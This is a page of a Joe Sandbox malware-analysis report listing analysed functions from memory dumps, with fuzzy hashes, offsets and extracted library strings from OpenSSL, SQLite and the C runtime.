                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007
                                                                                                                                                                      • String ID: ..\s\ssl\tls_srp.c$ssl_srp_ctx_init_intern
                                                                                                                                                                      • API String ID: 3568877910-1794268454
                                                                                                                                                                      • Opcode ID: 6852725cec06f59dcad314c5e55cc6ce5d9ebb9dcfc87e3297e6c10b13567424
                                                                                                                                                                      • Instruction ID: 0065794922b25a2268de227e282ccb81d07cc35f45b9455881e4f7d32ea2efe7
                                                                                                                                                                      • Opcode Fuzzy Hash: 6852725cec06f59dcad314c5e55cc6ce5d9ebb9dcfc87e3297e6c10b13567424
                                                                                                                                                                      • Instruction Fuzzy Hash: E6A14C26A1AB8291EA86DF25C4507B86360FB85B88F185535EF4D473A9EF3CE295C310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFAC72730 Relevance: 16.7, APIs: 11, Instructions: 230COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2037809311.00007FFDFAC71000.00000040.00000001.01000000.00000014.sdmp, Offset: 00007FFDFAC70000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2037779023.00007FFDFAC70000.00000002.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFACD2000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD1E000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD21000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD26000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD80000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD83000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD85000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2037809311.00007FFDFAD88000.00000040.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038143865.00007FFDFAD89000.00000080.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2038180876.00007FFDFAD8B000.00000004.00000001.01000000.00000014.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdfac70000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_initialize_crt__scrt_release_startup_lock
                                                                                                                                                                      • String ID:
                                                                                                                                                                      • API String ID: 349153199-0
                                                                                                                                                                      • Opcode ID: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
                                                                                                                                                                      • Instruction ID: 6d41bfca3e526d5b5da0435f5526b126ae0ae5f7842697384b188e223198074a
                                                                                                                                                                      • Opcode Fuzzy Hash: 5ae4ae1fad975d5487a8dd9099fd26104a61e4c8513e68d9fc499fd676c40ec1
                                                                                                                                                                      • Instruction Fuzzy Hash: 7381CE69F0C24786FB6CAB66B861A7D62D0EF45780F5880B5D96C473DEDE3CE8458700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF1D0670 Relevance: 16.2, APIs: 1, Strings: 8, Instructions: 487COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: cannot open %s column for writing$cannot open table without rowid: %s$cannot open view: %s$cannot open virtual table: %s$foreign key$indexed$no such column: "%s"$out of memory
                                                                                                                                                                      • API String ID: 817585512-554953066
                                                                                                                                                                      • Opcode ID: 8fb5a4ad7f386661572e50f4d71446c1a6b03b0938a1a7950b2fa449bafe7a10
                                                                                                                                                                      • Instruction ID: c409165feee8b557b21a02056ce6a029248ff30a625b48f53b3a390168521114
                                                                                                                                                                      • Opcode Fuzzy Hash: 8fb5a4ad7f386661572e50f4d71446c1a6b03b0938a1a7950b2fa449bafe7a10
                                                                                                                                                                      • Instruction Fuzzy Hash: 52325773F08B818AEB64CF259460AAD27A4FB48B88F504236DAAD5779DDF38E450C740
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF19F9D0 Relevance: 14.1, APIs: 1, Strings: 7, Instructions: 135COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: new[]
                                                                                                                                                                      • String ID: %s%c%s$:$:$?$\$winFullPathname1$winFullPathname2
                                                                                                                                                                      • API String ID: 4059295235-3840279414
                                                                                                                                                                      • Opcode ID: 407565720c01e4f4dae024f18073d7389dd2ad845b77d27617bea5722536b943
                                                                                                                                                                      • Instruction ID: a152f86856f5b91f7860183a0f75a844ca566fd522693d94e9111c80fd4d9405
                                                                                                                                                                      • Opcode Fuzzy Hash: 407565720c01e4f4dae024f18073d7389dd2ad845b77d27617bea5722536b943
                                                                                                                                                                      • Instruction Fuzzy Hash: 5051AF22F0828255FB259F62A421EB56791AF45B8CF480235DE7E976DEDF3CE445C380
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE00311497 Relevance: 10.8, APIs: 1, Strings: 5, Instructions: 306COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: $..\s\ssl\statem\extensions_srvr.c$HMAC$SHA2-256$tls_construct_stoc_cookie
                                                                                                                                                                      • API String ID: 0-1087561517
                                                                                                                                                                      • Opcode ID: d18fac02f8c16941b1c8b65281ccedea69a7ff46737656c446fcb388b997f323
                                                                                                                                                                      • Instruction ID: edc1765ed8c252529d4d345e8b6291331315dac91eee414e483644e46d2062d8
                                                                                                                                                                      • Opcode Fuzzy Hash: d18fac02f8c16941b1c8b65281ccedea69a7ff46737656c446fcb388b997f323
                                                                                                                                                                      • Instruction Fuzzy Hash: 81D18A65B1864391FB62AB62D8543FE23A5AF89784F149032DF0E47BEEDE3DE4458310
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFE003126F8 Relevance: 10.8, APIs: 2, Strings: 4, Instructions: 257COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040325489.00007FFE00311000.00000040.00000001.01000000.00000010.sdmp, Offset: 00007FFE00310000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2040290980.00007FFE00310000.00000002.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00393000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE00395000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003BD000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003C8000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040325489.00007FFE003D3000.00000040.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040558361.00007FFE003D7000.00000080.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040591479.00007FFE003D8000.00000004.00000001.01000000.00000010.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffe00310000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: ..\s\ssl\ssl_rsa.c$SERVERINFO FOR $SERVERINFOV2 FOR $SSL_CTX_use_serverinfo_file
                                                                                                                                                                      • API String ID: 0-2528746747
                                                                                                                                                                      • Opcode ID: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
                                                                                                                                                                      • Instruction ID: bbaf628345676747c86bbcb3ee5dee435404ca6e77ec740004c3fa315ced874e
                                                                                                                                                                      • Opcode Fuzzy Hash: 8b118266c9bc1b67049e630281c5b4ce7d7592436c424047e13d220b9c20d5b8
                                                                                                                                                                      • Instruction Fuzzy Hash: B8B18D61B18A4299FB12EB61D8801FD2BA5EF45B84F504032EB4D47BBDDE3CE64AC351
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF1B5C10 Relevance: 9.1, APIs: 2, Strings: 3, Instructions: 311COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                      • API String ID: 817585512-3764764234
                                                                                                                                                                      • Opcode ID: 1de547da237458ceaab650ade48cbe0b9da18c493a7469da66f36deaac9f7ff1
                                                                                                                                                                      • Instruction ID: 93ceadc6b656e222786c1ca0afe9d1a587ae5cba434c5d33698be369afa788e5
                                                                                                                                                                      • Opcode Fuzzy Hash: 1de547da237458ceaab650ade48cbe0b9da18c493a7469da66f36deaac9f7ff1
                                                                                                                                                                      • Instruction Fuzzy Hash: A5D18933B08686C6D764CF26E024AA977A5FB88B84F45823ADF6D47799DF39D441C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF1F3430 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 330COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      • unknown column "%s" in foreign key definition, xrefs: 00007FFDFF1F37CC
                                                                                                                                                                      • number of columns in foreign key does not match the number of columns in the referenced table, xrefs: 00007FFDFF1F34DE
                                                                                                                                                                      • foreign key on %s should reference only one column of table %T, xrefs: 00007FFDFF1F34B5
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: foreign key on %s should reference only one column of table %T$number of columns in foreign key does not match the number of columns in the referenced table$unknown column "%s" in foreign key definition
                                                                                                                                                                      • API String ID: 817585512-272990098
                                                                                                                                                                      • Opcode ID: 53b260d5c19ba0af737f73c0b7b8bd58974c7bbef4d0c5a08627db6769703676
                                                                                                                                                                      • Instruction ID: a137e65c977d5d28c72aac5319c4155a59804ddabc5136b9b6a7585124a1aade
                                                                                                                                                                      • Opcode Fuzzy Hash: 53b260d5c19ba0af737f73c0b7b8bd58974c7bbef4d0c5a08627db6769703676
                                                                                                                                                                      • Instruction Fuzzy Hash: 90D1CC63F09BC182EB648B169064ABA6BA1EB44B94F444331DE7E6B7D9DF3DE441C300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF215FB0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 305COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      • 00007FFE1A4519C0.VCRUNTIME140(?,?,?,?,00000000,?,00000000,?,00000000,?,?,00000000,00007FFDFF21685C,?,?,?), ref: 00007FFDFF216030
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: %.*z:%u$column%d$rowid
                                                                                                                                                                      • API String ID: 817585512-2903559916
                                                                                                                                                                      • Opcode ID: 3964bb9d76b9709d91abe0438d4a6b0c6ce0710c928f65d29acdb2c4f22bfa5b
                                                                                                                                                                      • Instruction ID: 654a69cc38d2592e427caaa32c96307ef219a27ba3912f19524a9b47092a5167
                                                                                                                                                                      • Opcode Fuzzy Hash: 3964bb9d76b9709d91abe0438d4a6b0c6ce0710c928f65d29acdb2c4f22bfa5b
                                                                                                                                                                      • Instruction Fuzzy Hash: 75C1B822B08682A5EB658B159464BBE6BA1FB44B98F488335DE7DC77C9DF3CE401C304
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF1E5F30 Relevance: 7.3, APIs: 2, Strings: 2, Instructions: 302COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: "%w" $%Q%s
                                                                                                                                                                      • API String ID: 817585512-1987291987
                                                                                                                                                                      • Opcode ID: 70089a1ab10ccdb80f81062c83cccb45b51b043593f9002f775aa1af9c088b51
                                                                                                                                                                      • Instruction ID: a095a881309896fbc7eff46f1deb9822eb31b8967d20e442bca5b368a9781435
                                                                                                                                                                      • Opcode Fuzzy Hash: 70089a1ab10ccdb80f81062c83cccb45b51b043593f9002f775aa1af9c088b51
                                                                                                                                                                      • Instruction Fuzzy Hash: 16C1BF32B18A8286EB14CF15A460AB977A1FB85BA4F944335DE7E877D9DF3CE4408300
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF1B3D20 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 260COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                      • API String ID: 817585512-3764764234
                                                                                                                                                                      • Opcode ID: 92896575b399f17702dbe2f9031b2e3563da43385516b4e512d4299d2d0acb62
                                                                                                                                                                      • Instruction ID: dd533f1a6f6416b1e94dd3477ba28769e9690cfc2604b3deb83c474386b2dcc2
                                                                                                                                                                      • Opcode Fuzzy Hash: 92896575b399f17702dbe2f9031b2e3563da43385516b4e512d4299d2d0acb62
                                                                                                                                                                      • Instruction Fuzzy Hash: 75B1BE33B08696C6D764CF65A0A4AAA77A5FB44784F014235DF6D87BC9DF3AE450C700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF1AF7C0 Relevance: 7.3, APIs: 1, Strings: 3, Instructions: 254COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID:
                                                                                                                                                                      • String ID: %s at line %d of [%.10s]$831d0fb2836b71c9bc51067c49fee4b8f18047814f2ff22d817d25195cf350b0$database corruption
                                                                                                                                                                      • API String ID: 0-3764764234
                                                                                                                                                                      • Opcode ID: 7e0931b530375c124a3ee55f9c72696fa5ae99066ddf30af2e12f5de08f06c38
                                                                                                                                                                      • Instruction ID: fcb4a7c5bd262dbdaf942061b16caef5a07af6491800f3cb0dc5bd2e293ecb1a
                                                                                                                                                                      • Opcode Fuzzy Hash: 7e0931b530375c124a3ee55f9c72696fa5ae99066ddf30af2e12f5de08f06c38
                                                                                                                                                                      • Instruction Fuzzy Hash: E1A10173B0C2D14AD7648B299464ABE7BA1EB81780F444335DBBA8B6C9EF3CE545D700
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF19DBB0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 249COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
                                                                                                                                                                      • Associated: 00000001.00000002.2039978584.00007FFDFF190000.00000002.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2E9000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF2EB000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040010467.00007FFDFF300000.00000040.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040226789.00007FFDFF302000.00000080.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      • Associated: 00000001.00000002.2040257521.00007FFDFF304000.00000004.00000001.01000000.0000000C.sdmpDownload File
                                                                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                                                                      • Snapshot File: hcaresult_1_2_7ffdff190000_mei.jbxd
                                                                                                                                                                      Similarity
                                                                                                                                                                      • API ID: 00007A4519
                                                                                                                                                                      • String ID: %s-shm$readonly_shm$winOpenShm
                                                                                                                                                                      • API String ID: 817585512-2815843928
                                                                                                                                                                      • Opcode ID: 8d2a6488cfe544708466a8bb6c48c74f0afd239d4f67e3118775d9e63ad55e06
                                                                                                                                                                      • Instruction ID: e9db666d3b71bc63af13f29824b51147682644731c80cce060834dab8dfb5803
                                                                                                                                                                      • Opcode Fuzzy Hash: 8d2a6488cfe544708466a8bb6c48c74f0afd239d4f67e3118775d9e63ad55e06
                                                                                                                                                                      • Instruction Fuzzy Hash: BEC15D22F09A4682EB659F21E474A7933A0FF44B58F544335DABE866E8EF3CE545C340
                                                                                                                                                                      Uniqueness

                                                                                                                                                                      Uniqueness Score: -1.00%

                                                                                                                                                                      Function 00007FFDFF1AFCD0 Relevance: 7.2, APIs: 1, Strings: 3, Instructions: 228COMMON
                                                                                                                                                                      Download Yara Rule
                                                                                                                                                                      APIs
                                                                                                                                                                      Strings
                                                                                                                                                                      Memory Dump Source
                                                                                                                                                                      • Source File: 00000001.00000002.2040010467.00007FFDFF191000.00000040.00000001.01000000.0000000C.sdmp, Offset: 00007FFDFF190000, based on PE: true
